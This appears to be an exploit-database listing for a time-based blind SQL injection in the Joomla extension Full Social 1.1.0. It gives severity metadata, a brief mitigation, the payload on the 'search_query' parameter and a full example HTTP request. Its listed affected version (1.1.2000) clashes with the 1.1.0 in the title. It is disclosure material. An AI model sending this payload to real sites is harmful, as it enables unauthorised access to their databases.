header-logo
Suggest Exploit
vendor:
Full Social
by:
L0RD or borna.nematzadeh123@gmail.com
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Full Social
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlaextensions:full_social:1.1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Win 10
2018

Joomla! extension Full Social 1.1.0 – ‘search_query’ SQL Injection

A SQL injection vulnerability exists in Joomla! extension Full Social 1.1.0. An attacker can send a specially crafted HTTP request containing a malicious 'search_query' parameter to execute arbitrary SQL commands on the vulnerable system. The payload used was a time-based blind payload of '1%' AND SLEEP(10)%23'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! extension Full Social 1.1.0 - 'search_query' SQL
Injection
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extension/full-social/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 1.1.0
# Tested on: Win 10
===================================================
# POC : SQLi

# Parameter : search_query
# Type : Time-based blind
# Payload : 1%' AND SLEEP(10)%23

# Request
============
GET
/en/search?controller=search&orderby=position&orderway=desc&search_query=1%25%27+AND+SLEEP%2810%29%23&submit_search=
HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.site.com/en/
Connection: keep-alive
Upgrade-Insecure-Requests: 1

===================================================